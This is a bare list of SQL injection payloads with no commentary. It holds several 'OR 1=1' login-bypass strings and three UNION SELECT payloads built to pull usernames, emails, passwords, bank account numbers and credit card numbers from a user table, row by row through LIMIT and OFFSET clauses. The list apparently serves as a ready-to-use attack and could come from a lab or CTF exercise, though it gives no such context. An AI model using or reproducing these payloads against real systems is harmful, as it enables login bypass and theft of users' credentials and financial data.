' OR '1'='1' -- 
' OR 1=1 -- 
' OR '1'='1' -- 
' OR "1"="1" -- 
' OR '1'='1' # 

' UNION SELECT NULL, username, email, password, bank_account1_type, bank_account1_number, credit_card1, bank_account2_type, bank_account2_number, credit_card2, bank_account3_type, bank_account3_number, credit_card3 FROM user --  

' UNION SELECT NULL, username, email, password, bank_account1_type, bank_account1_number, credit_card1, bank_account2_type, bank_account2_number, credit_card2, bank_account3_type, bank_account3_number, credit_card3 FROM user LIMIT 1 OFFSET 1 --  


' UNION SELECT NULL, username, email, password, bank_account1_type, bank_account1_number, credit_card1, bank_account2_type, bank_account2_number, credit_card2, bank_account3_type, bank_account3_number, credit_card3 FROM user WHERE id > 1 LIMIT 1 -- 